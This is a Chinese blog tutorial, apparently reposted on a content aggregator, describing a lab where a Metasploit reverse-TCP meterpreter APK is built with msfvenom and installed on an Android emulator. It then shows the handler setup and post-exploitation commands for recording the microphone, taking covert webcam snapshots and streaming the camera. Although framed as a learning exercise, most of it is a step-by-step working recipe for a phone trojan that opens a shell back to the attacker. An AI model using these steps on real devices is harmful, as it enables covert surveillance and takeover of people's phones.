手机木马远程控制复现

这篇具有很好参考价值的文章主要介绍了手机木马远程控制复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

目录

前言

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

1,实验涉及复现环境   

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

2.2,安装雷电模拟器 

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

2.3.2,进行配置 

2.3.3,安装成功后显示安装成功

3,生成后门

3.1,生成木马apk文件

3.2,将文件复制到windows系统上

3.3,将apk文件安装到模拟器中

3.4,木马文件安装成功

4,使用metasploit控制台对模拟器进行攻击

4.1 启动metasploit

4.2,使用攻击模块

4.3,设置攻击载荷

4.4,设置攻击机和端口号和攻击:

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

 4.6 看到成功返回shell

5, 成功后我们能做什么?

5.1,查看模拟手机的版本信息

5.2,查看手机的网络信息

5.3,查看root状态

5.4,启用网页视屏聊天

5.5,查看手机有几个摄像头

5.6,进行录音操作

5.7,一些其他操作

5.7.1.网络和系统信息获取

5.7.2,系统命令执行和摄像头操作

6,总结


前言

本文章主要是进行一次测试吧,自己之前也没有进行过测试关于apk木马远控,最近事情也比较多,自己也就做一个简单的测试吧,后期会尝试使用自己的手机做一个真机测试.

系列文章列表

渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2

思维导图

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

1,实验涉及复现环境   

  • Kali平台(Hack):192.168.10.xxx
  • Android模拟器(靶机1)
  • kali需要使用桥接模式,不然无法使用

                         如果出现桥接无法使用可以看这位大佬的配置教程 

                                kali无法连接网络(桥接、NAT无效)http://t.csdn.cn/r9cug

2,Android模拟器环境配置

2.1,首先从官网上下载雷电模拟器

                                                   打开官网进行下载

雷电安卓模拟器-手游模拟器安卓版_android手机模拟器电脑版_雷电模拟器官网 (ldmnq.com)https://www.ldmnq.com/

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

2.2,安装雷电模拟器 

                   下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

                         安装后我们会在桌面看到这两个图标,然后我们点击雷神多开器

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

2.3, 对模拟器网络进行配置

2.3.1,为什么要进行配置

   安照我自己的理解就是,我们是在模拟器中模拟手机,所以就类似于我们使用虚拟机一样,所以我们需要将其与主机在同一网段下,这样我们才能对其进行攻击与控制.

2.3.2,进行配置 

对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

2.3.3,安装成功后显示安装成功

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

3,生成后门

3.1,生成木马apk文件

打开虚拟机,启动kali,打开终端,生成apk后门。lhost为kali的ip(可以根据自己的IP设定),lport指定一个端口5001(这里生成时指定的端口要与后续使用攻击端口一致,当然也不能使用特殊端口)。打开终端输入命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.223.138 lport=5001 >内心如初.apk

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

3.2,将文件复制到windows系统上

生成文件后,因为我是在桌面打开的终端文件会自动生成到桌面,然后将apk文件粘贴到我们的windows平台下,然后启动我们的雷电模拟器,点击启动:

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

3.3,将apk文件安装到模拟器中

                           这里我们可以将文件拖入或是选择文件放入也行

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

                                     在右下角有个apk,点击选择文件安装。

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

3.4,木马文件安装成功

                                出现下面的图标代表安装木马文件成功

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

4,使用metasploit控制台对模拟器进行攻击

这里关于前面的内容我就快速过来了,如果感兴趣的可以去看系列文章,有前面操作的详细介绍

4.1 启动metasploit

msfconsole 

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

4.2,使用攻击模块

use exploit/multi/handler

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

4.3,设置攻击载荷

                                           攻击载荷也就是攻击的脚本

set payload android/meterpreter/reverse_tcp

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

4.4,设置攻击机和端口号和攻击:

                 这里设置的ip地址是kali的,设置的端口要与制作木马时设置的一致

set lhost 192.168.xxx.xxx
set lport 5001
run

 手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

4.5,回到我们的模拟器靶机,我们点击运行我们安装的文件

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

 4.6 看到成功返回shell

                                     只要双击一次即可,这里是我多点了

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5, 攻击成功后我们能做什么?

                                    这里在进行其他操作前需要先加载stdapi扩展

load stdapi

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.1,查看模拟手机的版本信息

sysinfo

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.2,查看手机的网络信息

ifconfig

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.3,查看root状态

check_root

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

                                                         手机无root权限

5.4,启用网页视屏聊天

webcam_chat

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.5,查看手机有几个摄像头

webcam_list

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

                                                        显示有两个摄像头 

5.6,进行录音操作

record_mic

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.7,一些其他操作

                                    进行调用摄像头偷拍,默认为前置摄像头

webcam_snap

网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法可以获取到一段图片资料 

webcam_stream

                              获得shell后有很多的攻击方法,将其汇总如下

5.7.1.网络和系统信息获取

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

5.7.2,系统命令执行和摄像头操作

手机木马远程控制复现,# 网路安全实战,智能手机,网络安全,安卓,笔记,linux,学习,经验分享

6,总结

本章是对使用木马对手机渗透远控的一次测试,在测试过程中我遇到了,在连接时IP无法使用,在我的思考下,我发现可能是主机的链接方式需要以桥接模式,这样才能保证,主机与和攻击目在同一网段下,但我链接后,发现无论如何也没发连上桥接网络的网络,并且是用ifconfig,并没有显示kali的主机ipv4地址,在我的不断搜索和尝试下,最终连上了网路获取到了新的IP地址,然后重新制作木马apk文件,再进行一次刚刚的流程,虽然解决问题的过程很累,但解决的那一刻,我是很欣喜的,快乐也就如此了吧,再学习自己喜欢的事情上,总是很有动力.

每日一言

如果可以的话,我也想成为这个世界中特殊的存在。

  如果我的学习笔记对你有用,不妨点赞收藏一下,感谢你的支持,当然也欢迎大佬给我一下建议或是对笔记中的不足进行补充,对我学习大有帮助,谢谢。  文章来源地址https://www.toymoban.com/news/detail-708488.html

到了这里,关于手机木马远程控制复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 手机远程控制之scrcpy(一)

    有线投屏 无线投屏 屏幕录制 常见问题 错误检查 ERROR: Exception on thread 投屏模糊 scrcpy 是免费开源的投屏软件,支持将安卓手机屏幕投放在 Windows、macOS、GNU/Linux 上,并可直接借助鼠标在投屏窗口中进行交互和录制。 市面上主流的多屏协同软件都是基于 scrcpy 开发,套层皮,

    2024年02月09日
    浏览(35)
  • 分分钟穿透手机,实现远程控制

    大家好,我是鸟哥。一个半路出家的程序员。 之前给大家分过一篇文章——一行命令就把女友们的手机彻底监控了~我可以为所欲为了...,教大家使用Scrcpy实现电脑对手机的无线监控(更确切的说应该是投屏),但是受限于只能在局域网下使用,这就非常鸡肋了。不过在文末

    2024年02月04日
    浏览(48)
  • 怎么使用手机远程控制Win10电脑?

    “近期,我将出差一段时间。问题是,我希望能够从很远的地方浏览家里电脑上的一些东西,但我不会一直随身携带笨重的笔记本电脑。我可以手机远程访问Windows电脑吗? ”          当然,您可以从任何地方使用手机远程访问Windows电脑。在这篇文章中,我们将介绍如何使

    2024年02月12日
    浏览(48)
  • 如何让两台手机相互远程控制?

    你的两台手机是什么系统的?如果你的两台手机都是安卓系统,而且都是安卓7.0及以上版本的系统,那么恭喜你,这两台手机可以相互远程控制! 你可以利用两个软件实现将两台手机相互远程控制的想法。为了避免混淆,下文将以【手机A】和【手机B】讲述两台手机相互远程

    2024年02月07日
    浏览(39)
  • TeamViewer Host无人值守远程控制手机,无需root。

    本人用的是华为mate8,操作系统是安卓8,无需root。 网上搜过一些内容,参考了一些文章,那些文章的链接在哪我也记不清了 就写写我的操作步骤 1、手机端安装teamviewer host及teamviewer universal add-on。 华为官方应用市场里面就能搜到,必须都要安装   2、 安装之后,第一次打开

    2024年02月08日
    浏览(198)
  • 毕业设计——基于STM32的智能家具控制系统(ESP-01S(8266)、手机app远程控制、远程显示温度)

    智能家具系统分为两个不同版本系列: ①系列一:手机app远程控制、远程检测温湿度显示在app,(云平台)    ---------本文章 ②系列二:语音识别控制                https://blog.csdn.net/m0_59113542/article/details/123742383 步进电机及相关驱动 步进电机28BYJ48 uln2003驱动板器4相5线

    2023年04月09日
    浏览(77)
  • 同时驾驭两台手机的高效秘籍:用一台手机远程控制另一台手机

    掌中宇宙换星辰, 机异品牌意自新。 触指间通万里讯, 智慧生活随心行。 科技不仅仅改变了我们的生活方式,更是让我们的生活充满了惊喜和便捷。工作手机,高效沟通,项目进展一手掌握,让职场你更加出彩。生活手机,私人时光,家人朋友信息不错过,让生活你更加精

    2024年04月11日
    浏览(85)
  • Python开发学习之Python实现用手机监控远程控制电脑

    很多时候,我们都有远程控制电脑的需求。比如正在某样东西,需要让电脑在完后关机。或者你需要监控一个程序的运行状况等。 今天我们就来用Python实现一个远程监控并控制电脑的小程序。 实现原理 听起来远程控制电脑好像很高级的样子,但是实现起来其实非常简单。实

    2024年02月16日
    浏览(38)
  • 如何通过 nginx 实现远程投屏并控制 android 手机

    操作步骤 本地电脑 Local-A.   远程电脑 Remote-B 和 跟 Remote-B 通过 USB 连接的手机 C 1. 手机 C 连接到 Remote-B 2. Remote-B  通adb tcpip port 将台架的adb设置为以太网模式,从而使台架的adb服务可以被端口绑定。 # enable adb ethernet connection adb tcpip 5555 配置 nginx 5. 修改跳板机nginx配置,将端

    2024年02月12日
    浏览(51)
  • 想用电脑远程控制手机?两款软件可以轻松做到,还能双向语音!

    据中国电子装备技术开发协会统计,截至2021年底,国内手机社会保有量达到了18.56亿部,中国人均拥有1.3部手机,超过世界平均水平,部分人甚至拥有四部、五部手机。超两成用户一年换一部手机,每年产生4亿部废旧手机。 手机多,但出门带着总感觉重,可是每台手机也有

    2024年01月18日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包